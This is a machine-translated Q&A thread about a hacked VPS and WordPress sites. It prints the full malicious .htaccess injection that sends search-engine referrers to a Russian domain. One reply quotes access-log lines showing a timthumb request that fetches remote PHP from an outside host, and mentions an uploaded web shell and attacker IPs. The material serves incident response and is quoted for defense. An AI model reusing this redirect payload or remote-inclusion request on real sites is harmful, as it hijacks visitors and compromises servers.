可能重复:
我的服务器被黑了应急
所以我非常恐慌。
我有一个Rails应用程序,我build立了一个VPS的临时环境。 我在本月早些时候configuration了它,一切正常(特别是与capistrano部署)。 今天,我将最新的开发代码部署到了Web服务器上,并进行了testing。 我打了url( http://openstudyr.ashleyangell.com ),注意到这是奇怪的查找“ http://guide-securesoft.ru/fliht/index.php?1314066061 ”,我从来没有听说过之前,并且点击我的任何链接也是(最终redirect到相同/相似的URL)。
我并不擅长Linux,但我很聪明,可以确保所有的SSH都是通过密钥身份validation完成的,我从不以root身份运行,root密码是长度为24个字符的字母数字string。
我检查了我的虚拟主机的Apacheconfiguration,但正如我离开它。
我觉得我的心脏即将射出我的胸部,爆炸。 我不知道该怎么做,或接下来要检查什么。
我试着谷歌search类似的问题,但没有明显的出现。
可以请帮忙吗? 我怎么能a)validation我是否已经被攻破,b)解决这个问题,并阻止它发生(我知道,直到一直没有得到答案)。
🙁
更新#1:
看起来好像我所有的URL在浏览器执行时都会自动执行redirect,但是如果我直接点击URLS,它们就可以正常工作。 奇怪的。
更新#2:
它也是具有相同问题的父域http://ashleyangell.com (我的个人博客)。 但是,所有其他虚拟主机似乎不受影响。
更新#3:
我在其他机器上testing过。 他们都在做同样的行为,这让我觉得它与我的开发机器或互联网连接不是孤立的。 (是吗?)
更新#4:
我运行sudo grep -ri -l "guide-securesoft" /var和服务器匹配的所有.htaccess文件! 所以我select了有问题的域名,并运行cat /var/www/vhosts/openstudyr.ashleyangell.com/.htaccess ,这就是我得到的(我把它清理成可读的):
ErrorDocument 400 http://guide-securesoft.ru/fliht/index.php ErrorDocument 401 http://guide-securesoft.ru/fliht/index.php ErrorDocument 403 http://guide-securesoft.ru/fliht/index.php ErrorDocument 404 http://guide-securesoft.ru/fliht/index.php ErrorDocument 500 http://guide-securesoft.ru/fliht/index.php <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://guide-securesoft.ru/fliht/index.php [R=301,L] </IfModule>
至less现在我知道他们是怎么做的 – 但是我怎么能阻止它再次发生?
看起来像/wp-content/下的所有东西都在抛出301redirect。 看看有什么可能是一个恶意的.htaccess文件 – 可能是一个违反帐户或在WordPress上允许上传的漏洞(确保你的WP完全是最新的)。
除此之外 – 取决于攻击向量,系统可能会有更多的方面受到威胁; 传统的看法是把系统核武,恢复到妥协之前的备份。 违规可能仅限于他们对/wp-content/所能做的事情,如果你没有一个好的备份恢复选项,那么清理这个可能就足够了,但除非你能确定违规的来源,你可能没有把它清理干净。
看到这里有一些很好的讨论和下一步做什么的答案 – 祝你好运!
我们刚刚发生了同样的事情发生在我们的WordPress的安装; 感谢指针。 有人在这里注意到404ing.php页面redirect到http://securesoft-trip.ru/attention/index.php?rf=或类似的,我发现有问题的.htaccess文件使用“find / wordpress_dir / -exec grep”securesoft “{} / dev / null \;”。 最近修改了哪些内容
在过去的几天中,我search了一些在wordpress中修改过的东西(find wordpress_dir / -mtime -3),在根目录下find了“script_new3.php”(class PHPMailer)和“wp.php”(#Web Shell by oRb)我们的主题之一。
access_logs有很长的路要走,所以查看一下这些文件的创build时间和IP地址。 在第一次在主题1中发现“wp.php”中出现“216.246.79.192 – ”GET主题/ * / wp.php HTTP / 1.0“200 31311”“和POST请求到”thumb.php“ (还有几个星期的search“timthumb.php”和“thumb.php”的垃圾search)
经过一番四处寻找,我发现这个漏洞,允许file upload,显然我们有一个坏的版本在一个我们老WooThemes夫妇。 我看到一个“GET /*/thumb.php?src=http://bloggeracom.cu.cc/1.php HTTP / 1.1”400 117,可以做到这一点。
这里有一些IP寻找,那么POST / GET提到的任何一个文件(216.246.79.192 – 代理,92.63.104.30,94.45.130.238,91.193.165.188)。